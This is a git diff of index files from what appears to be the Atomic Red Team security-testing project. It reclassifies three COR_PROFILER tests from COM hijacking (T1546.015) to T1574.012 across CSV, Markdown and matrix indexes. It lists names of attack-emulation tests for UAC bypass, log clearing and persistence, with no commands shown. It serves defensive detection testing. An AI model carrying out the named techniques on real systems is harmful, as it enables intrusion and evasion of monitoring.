 defense-evasion,T1070.003,Clear Command History,3,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 24a2d7de..e04b500f 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -13,10 +13,10 @@ privilege-escalation,T1548.002,Bypass User Access Control,4,Bypass UAC using Fod
 privilege-escalation,T1548.002,Bypass User Access Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell
 privilege-escalation,T1548.002,Bypass User Access Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
 privilege-escalation,T1548.002,Bypass User Access Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
+privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
+privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
+privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
 privilege-escalation,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
-privilege-escalation,T1546.015,Component Object Model Hijacking,1,COM Hijack Leveraging user scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
-privilege-escalation,T1546.015,Component Object Model Hijacking,2,COM Hijack Leveraging System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
-privilege-escalation,T1546.015,Component Object Model Hijacking,3,COM Hijack Leveraging registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
 privilege-escalation,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
 privilege-escalation,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
 privilege-escalation,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
@@ -65,6 +65,9 @@ defense-evasion,T1548.002,Bypass User Access Control,6,Bypass UAC by Mocking Tru
 defense-evasion,T1548.002,Bypass User Access Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
 defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt
 defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt
+defense-evasion,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
+defense-evasion,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
+defense-evasion,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
 defense-evasion,T1070.001,Clear Windows Event Logs,1,Clear Logs,e6abb60e-26b8-41da-8aae-0c35174b0967,command_prompt
 defense-evasion,T1070.001,Clear Windows Event Logs,2,Delete System Logs Using Clear-EventLog,b13e9306-3351-4b4b-a6e8-477358b0b498,powershell
 defense-evasion,T1027.004,Compile After Delivery,1,Compile After Delivery using csc.exe,ffcdbd6a-b0e8-487d-927a-09127fe9a206,command_prompt
@@ -207,10 +210,10 @@ persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4ab
 persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
 persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
 persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
+persistence,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
+persistence,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
+persistence,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
 persistence,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
-persistence,T1546.015,Component Object Model Hijacking,1,COM Hijack Leveraging user scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
-persistence,T1546.015,Component Object Model Hijacking,2,COM Hijack Leveraging System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
-persistence,T1546.015,Component Object Model Hijacking,3,COM Hijack Leveraging registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
 persistence,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
 persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
 persistence,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index af181089..65d973af 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -31,14 +31,14 @@
   - Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows]
   - Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
   - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
-- T1574.012 COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md)
+  - Atomic Test #1: User scope COR_PROFILER [windows]
+  - Atomic Test #2: System Scope COR_PROFILER [windows]
+  - Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
 - [T1546.001 Change Default File Association](../../T1546.001/T1546.001.md)
   - Atomic Test #1: Change Default File Association [windows]
 - T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1546.015 Component Object Model Hijacking](../../T1546.015/T1546.015.md)
-  - Atomic Test #1: COM Hijack Leveraging user scope COR_PROFILER [windows]
-  - Atomic Test #2: COM Hijack Leveraging System Scope COR_PROFILER [windows]
-  - Atomic Test #3: COM Hijack Leveraging registry-free process scope COR_PROFILER [windows]
+- T1546.015 Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1134.002 Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1053.003 Cron](../../T1053.003/T1053.003.md)
@@ -204,16 +204,16 @@
   - Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos]
   - Atomic Test #3: Firefox [linux, windows, macos]
   - Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
-- T1574.012 COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md)
+  - Atomic Test #1: User scope COR_PROFILER [windows]
+  - Atomic Test #2: System Scope COR_PROFILER [windows]
+  - Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
 - [T1546.001 Change Default File Association](../../T1546.001/T1546.001.md)
   - Atomic Test #1: Change Default File Association [windows]
 - T1136.003 Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1542.002 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1546.015 Component Object Model Hijacking](../../T1546.015/T1546.015.md)
-  - Atomic Test #1: COM Hijack Leveraging user scope COR_PROFILER [windows]
-  - Atomic Test #2: COM Hijack Leveraging System Scope COR_PROFILER [windows]
-  - Atomic Test #3: COM Hijack Leveraging registry-free process scope COR_PROFILER [windows]
+- T1546.015 Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1136 Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -467,7 +467,10 @@
 - [T1218.003 CMSTP](../../T1218.003/T1218.003.md)
   - Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
   - Atomic Test #2: CMSTP Executing UAC Bypass [windows]
-- T1574.012 COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md)
+  - Atomic Test #1: User scope COR_PROFILER [windows]
+  - Atomic Test #2: System Scope COR_PROFILER [windows]
+  - Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
 - [T1070.003 Clear Command History](../../T1070.003/T1070.003.md)
   - Atomic Test #1: Clear Bash history (rm) [linux, macos]
   - Atomic Test #2: Clear Bash history (echo) [linux, macos]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 7880cd3c..63b7389c 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -26,13 +26,13 @@
   - Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows]
   - Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
   - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
-- T1574.012 COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md)
+  - Atomic Test #1: User scope COR_PROFILER [windows]
+  - Atomic Test #2: System Scope COR_PROFILER [windows]
+  - Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
 - [T1546.001 Change Default File Association](../../T1546.001/T1546.001.md)
   - Atomic Test #1: Change Default File Association [windows]
-- [T1546.015 Component Object Model Hijacking](../../T1546.015/T1546.015.md)
-  - Atomic Test #1: COM Hijack Leveraging user scope COR_PROFILER [windows]
-  - Atomic Test #2: COM Hijack Leveraging System Scope COR_PROFILER [windows]
-  - Atomic Test #3: COM Hijack Leveraging registry-free process scope COR_PROFILER [windows]
+- T1546.015 Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1134.002 Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1574.001 DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
@@ -139,7 +139,10 @@
 - [T1218.003 CMSTP](../../T1218.003/T1218.003.md)
   - Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
   - Atomic Test #2: CMSTP Executing UAC Bypass [windows]
-- T1574.012 COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md)
+  - Atomic Test #1: User scope COR_PROFILER [windows]
+  - Atomic Test #2: System Scope COR_PROFILER [windows]
+  - Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
 - [T1070.001 Clear Windows Event Logs](../../T1070.001/T1070.001.md)
   - Atomic Test #1: Clear Logs [windows]
   - Atomic Test #2: Delete System Logs Using Clear-EventLog [windows]
@@ -399,14 +402,14 @@
   - Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos]
   - Atomic Test #3: Firefox [linux, windows, macos]
   - Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
-- T1574.012 COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md)
+  - Atomic Test #1: User scope COR_PROFILER [windows]
+  - Atomic Test #2: System Scope COR_PROFILER [windows]
+  - Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
 - [T1546.001 Change Default File Association](../../T1546.001/T1546.001.md)
   - Atomic Test #1: Change Default File Association [windows]
 - T1542.002 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1546.015 Component Object Model Hijacking](../../T1546.015/T1546.015.md)
-  - Atomic Test #1: COM Hijack Leveraging user scope COR_PROFILER [windows]
-  - Atomic Test #2: COM Hijack Leveraging System Scope COR_PROFILER [windows]
-  - Atomic Test #3: COM Hijack Leveraging registry-free process scope COR_PROFILER [windows]
+- T1546.015 Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1136 Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/Matrices/matrix.md b/atomics/Indexes/Matrices/matrix.md
index bb274f6b..0fba463c 100644
--- a/atomics/Indexes/Matrices/matrix.md
+++ b/atomics/Indexes/Matrices/matrix.md
@@ -10,20 +10,20 @@
 | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bypass User Access Control](../../T1548.002/T1548.002.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | [Domain Account](../../T1087.002/T1087.002.md) | [Pass the Ticket](../../T1550.003/T1550.003.md) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [CMSTP](../../T1218.003/T1218.003.md) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Groups](../../T1069.002/T1069.002.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [At (Windows)](../../T1053.002/T1053.002.md) | COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Domain Trust Discovery](../../T1482/T1482.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [At (Windows)](../../T1053.002/T1053.002.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Domain Trust Discovery](../../T1482/T1482.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | DCSync [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1569.001/T1569.001.md) | [BITS Jobs](../../T1197/T1197.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [Launchd](../../T1053.004/T1053.004.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Access Control](../../T1548.002/T1548.002.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
+| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
 | Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Share Discovery](../../T1135/T1135.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Native API](../../T1106/T1106.md) | [Browser Extensions](../../T1176/T1176.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Golden Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [PowerShell](../../T1059.001/T1059.001.md) | COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Component Object Model Hijacking](../../T1546.015/T1546.015.md) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Password Policy Discovery](../../T1201/T1201.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [PowerShell](../../T1059.001/T1059.001.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Password Policy Discovery](../../T1201/T1201.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | [Scheduled Task](../../T1053.005/T1053.005.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kerberoasting](../../T1558.003/T1558.003.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) |  | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) |
 |  | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keychain](../../T1555.001/T1555.001.md) | [Process Discovery](../../T1057/T1057.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Create Snapshot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) | [Query Registry](../../T1012/T1012.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Data Staging](../../T1074.001/T1074.001.md) |  | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-|  | [Service Execution](../../T1569.002/T1569.002.md) | [Component Object Model Hijacking](../../T1546.015/T1546.015.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | [Local Email Collection](../../T1114.001/T1114.001.md) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) |
